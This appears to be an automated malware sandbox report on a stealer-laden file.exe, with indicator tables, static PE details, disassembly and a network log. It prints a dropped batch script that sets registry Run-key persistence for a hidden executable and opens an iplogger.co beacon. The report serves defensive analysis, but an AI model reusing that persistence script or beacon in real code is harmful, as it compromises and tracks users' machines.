Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
239.255.255.250	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
104.21.82.93	file.exe	Get hash	malicious	LummaC Stealer	Browse
	cmd.exe	Get hash	malicious	Unknown	Browse
	newvideozones.click.ps1	Get hash	malicious	LummaC	Browse
	newvideozones.click.ps1	Get hash	malicious	Unknown	Browse
	pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev.ps1	Get hash	malicious	LummaC	Browse
	encrypter-windows-x86.exe	Get hash	malicious	Unknown	Browse
	yWny5Jds8b.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse
	https://prezi.com/i/view/0dF0780HKO9RqC8umFaJ	Get hash	malicious	Unknown	Browse
172.67.167.249	file.exe	Get hash	malicious	LummaC Stealer	Browse
	sus.ps1	Get hash	malicious	LummaC	Browse
	ofsetvideofre.click.ps1	Get hash	malicious	LummaC	Browse
	4h1Zc12ZBe.exe	Get hash	malicious	Stealc	Browse
	dlcdkJcbbV.exe	Get hash	malicious	LummaC, RedLine	Browse
	1Vkf7silOj.exe	Get hash	malicious	LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc	Browse
	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse
	https://prezi.com/i/view/0dF0780HKO9RqC8umFaJ	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
iplogger.co	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.167.249
	sus.ps1	Get hash	malicious	LummaC	Browse	172.67.167.249
	cW5i0RdQ4L.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	cW5i0RdQ4L.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	Activator by URKE v2.5.exe	Get hash	malicious	LummaC	Browse	172.67.188.178
	SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe	Get hash	malicious	Unknown	Browse	104.21.76.57
	file.exe	Get hash	malicious	DarkTortilla, PureLog Stealer	Browse	104.21.76.57
	file.exe	Get hash	malicious	DarkTortilla	Browse	104.21.76.57
	cmd.exe	Get hash	malicious	Unknown	Browse	104.21.82.93

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	Vidar	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 13.107.246.63 23.218.208.109 20.12.23.50

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exe	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse

Created / dropped Files

C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exe

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	14833664
Entropy (8bit):	6.4046623433494805
Encrypted:	false
SSDEEP:	98304:gZs/pFGCjU0MZsGgLvqPzz3dcaVAU5DL/Pu7KB7biH/4CM39r/GsIsS6qUr1UrEM:jPM085dcamCfgKBsIPSSBILdnZp
MD5:	3475C7D37C7995451275305684114989
SHA1:	648098615CA3A981FF8154063EE78F95359A7769
SHA-256:	7B029D45FDAB9E8FEEE93E443B9B179C6D4010810BA2DDE3F2611BF24A7F09A4
SHA-512:	5154D0B550B5DF31EA070E8000A50C970BF13020DD2A133E5648AAC60C9958ED4F3A2EA8D6AD0E1F513E94B6352DDA269FD27044ABA33BB6CE88F6FE17F547AF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................i..................@....@..........................p............@..................................`...........e...................p..Bv..................................................._...............................text...5.i.......i................. ..`.rdata..T.l..0i...l...i.............@..@.data...l....@...X..................@....idata.......`.......t..............@....reloc..Bv...p...x...x..............@..B.symtab................................B.rsrc....e.......f..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\s.bat

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	347
Entropy (8bit):	5.241342430352341
Encrypted:	false
SSDEEP:	6:hwszH1j0KpIAgidquHxEDscfoZH1j0KpIAgidquHxEDsWEEDwTGQCCAP+YOA:HVj0KprgidquS+Vj0KprgidquqSqXCQ9
MD5:	C27142AA5D9C13E25E9335A57A952743
SHA1:	725EED87891582F0D5BC1622F5A84CB5B77E2495
SHA-256:	C5A6FC64F2EBF5C1FD0E39E4AE37D53FEA01A6758A74B1544D2D475A97DD09AD
SHA-512:	43FC9B010ED3CD9F7ADD8E774613492355E41D08FD9E2790AFD0CF9ED08133BE74BDC543C5D6820CE4B68898D07407EC5CF090DBD75180255A4763A3C730BE42
Malicious:	false
Reputation:	low
Preview:	@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\dileapp.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\dileapp.exe"..start %Public%\Netstat\dileapp.exe..@echo off..start "" "https://iplogger.co/1tJFB4"..exit..

Chrome Cache Entry: 46

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	2833
Entropy (8bit):	7.876846206921263
Encrypted:	false
SSDEEP:	48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
MD5:	18C023BC439B446F91BF942270882422
SHA1:	768D59E3085976DBA252232A65A4AF562675F782
SHA-256:	E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
SHA-512:	A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
Malicious:	false
URL:	https://iplogger.co/favicon.ico
Preview:	.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...\|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..\|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......\|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..\|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

Chrome Cache Entry: 47

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2833
Entropy (8bit):	7.876846206921263
Encrypted:	false
SSDEEP:	48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
MD5:	18C023BC439B446F91BF942270882422
SHA1:	768D59E3085976DBA252232A65A4AF562675F782
SHA-256:	E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
SHA-512:	A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
Malicious:	false
Preview:	.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...\|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..\|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......\|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..\|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.985086875325514
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	4'963'581 bytes
MD5:	b9657f229c7591f44dbef1bfb5c2be01
SHA1:	75698067fa4151e5f980035c9e4e528fb07fa1e3
SHA256:	6833761d646963c16bba26bce95782d216d9450e1cce16c2560e49ffa7f95f7a
SHA512:	26bbed1c31005dada42bead2f8211755af39907dbe261cb9f19848c5038ebbd8432f2b0de07a5262c4780e0e4d0cba3df3cdb1555b4c2058784e8bacf5301287
SSDEEP:	98304:VIJBJTkxRI3MsZZhkZA7phtcK37nAT9fnJKqTAAgaVKLmnls:VwkvCFZeW7phtck7u/Kqyfals
TLSH:	07363342BAC3D4F1E9360D32522A9F511F7D7E203F1265FFA3503A5DD528162A238EDA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41d779
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	00be6e6c4f9e287672c8301b72bdabf3

Entrypoint Preview

Instruction
call 00007FF52087BCDFh
jmp 00007FF52087B6D3h
cmp ecx, dword ptr [0043A1C8h]
jne 00007FF52087B845h
ret
jmp 00007FF52087BE56h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00430FE8h
mov dword ptr [ecx], 00431994h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FF52086EDDDh
mov dword ptr [esi], 004319A0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004319A8h
mov dword ptr [ecx], 004319A0h
ret
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00431988h
push eax
call 00007FF52087E9EEh
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 00431988h
push eax
call 00007FF52087E9D7h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FF52087B84Ch
push 0000000Ch
push esi
call 00007FF52087AE12h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FF52087B7AEh
push 00437B58h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FF52087E0D6h
int3
push ebp
mov ebp, esp
sub esp, 0Ch

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x38cd0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x38d04	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0xe034	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6c000	0x1fd0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x36ee0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x31928	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x30000	0x25c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x38254	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2e864	0x2ea00	8c2dd3ebce78edeed565107466ae1d3e	False	0.5908595844504021	data	6.693477406609911	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x30000	0x9aac	0x9c00	b8d3a709e8e2861298e51f270be0f883	False	0.45718149038461536	data	5.133828516884417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3a000	0x213d0	0xc00	7a066b052b7178cd1388c71d17dec570	False	0.2789713541666667	data	3.2428863859698565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids	0x5c000	0xe8	0x200	0a8129f1f5d2e8ddcb61343ecd6f891a	False	0.33984375	data	2.0959167744603624	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x5d000	0xe034	0xe200	0c300f4f350c5eb1b8807504b5028be7	False	0.6342643805309734	data	6.802552664276539	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6c000	0x1fd0	0x2000	983e78af74da826d9233ebaa3055869a	False	0.8060302734375	data	6.687357530503152	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
PNG	0x5d644	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	1.0027729636048528
PNG	0x5e18c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	0.9363390441839495
RT_ICON	0x5f738	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	0.47832369942196534
RT_ICON	0x5fca0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	0.5410649819494585
RT_ICON	0x60548	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	0.4933368869936034
RT_ICON	0x613f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	0.5390070921985816
RT_ICON	0x61858	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.41393058161350843
RT_ICON	0x62900	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	0.3479253112033195
RT_ICON	0x64ea8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9809269502193401
RT_DIALOG	0x68c1c	0x2a2	data	0.5296735905044511
RT_DIALOG	0x68ec0	0x13a	data	0.6624203821656051
RT_DIALOG	0x68ffc	0xf2	data	0.71900826446281
RT_DIALOG	0x690f0	0x14e	data	0.5868263473053892
RT_DIALOG	0x69240	0x318	data	0.476010101010101
RT_DIALOG	0x69558	0x24a	data	0.6262798634812287
RT_STRING	0x697a4	0x1fc	data	0.421259842519685
RT_STRING	0x699a0	0x246	data	0.41924398625429554
RT_STRING	0x69be8	0x1dc	data	0.5105042016806722
RT_STRING	0x69dc4	0xdc	data	0.65
RT_STRING	0x69ea0	0x468	data	0.375
RT_STRING	0x6a308	0x164	data	0.5056179775280899
RT_STRING	0x6a46c	0xe4	data	0.6359649122807017
RT_STRING	0x6a550	0x158	data	0.4563953488372093
RT_STRING	0x6a6a8	0xe8	data	0.5948275862068966
RT_STRING	0x6a790	0xe6	data	0.5695652173913044
RT_GROUP_ICON	0x6a878	0x68	data	0.7019230769230769
RT_MANIFEST	0x6a8e0	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	0.39786666666666665

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2024 12:47:07.192233086 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:07.192234993 CET	49736	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:07.192246914 CET	443	49735	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:07.192272902 CET	443	49736	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:07.192334890 CET	49736	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:07.192338943 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:07.192768097 CET	49736	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:07.192781925 CET	443	49736	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:07.193516970 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:07.193538904 CET	443	49735	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.406563044 CET	443	49735	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.407139063 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.407177925 CET	443	49735	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.408314943 CET	443	49735	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.408384085 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.410732985 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.410794973 CET	443	49735	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.410931110 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.410959959 CET	443	49735	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.411082983 CET	443	49735	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.411092997 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.411117077 CET	443	49735	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.411143064 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.411143064 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.411180019 CET	49735	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.411377907 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.411405087 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.411463976 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.411891937 CET	49739	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.411906004 CET	443	49739	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.447664976 CET	443	49736	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.447999954 CET	49736	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.448028088 CET	443	49736	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.449227095 CET	443	49736	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.449291945 CET	49736	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.449626923 CET	49736	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.449642897 CET	49736	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.449687004 CET	443	49736	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.449707031 CET	49736	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.449748993 CET	49736	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.450050116 CET	49740	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.450088024 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:08.450170040 CET	49740	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.450344086 CET	49740	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:08.450364113 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.664957047 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.667160988 CET	49740	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:09.667177916 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.668087959 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.668155909 CET	49740	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:09.671000004 CET	49740	443	192.168.2.4	104.21.82.93
Nov 30, 2024 12:47:09.671057940 CET	443	49740	104.21.82.93	192.168.2.4
Nov 30, 2024 12:47:09.671348095 CET	49740	443	192.168.2.4	104.21.82.93
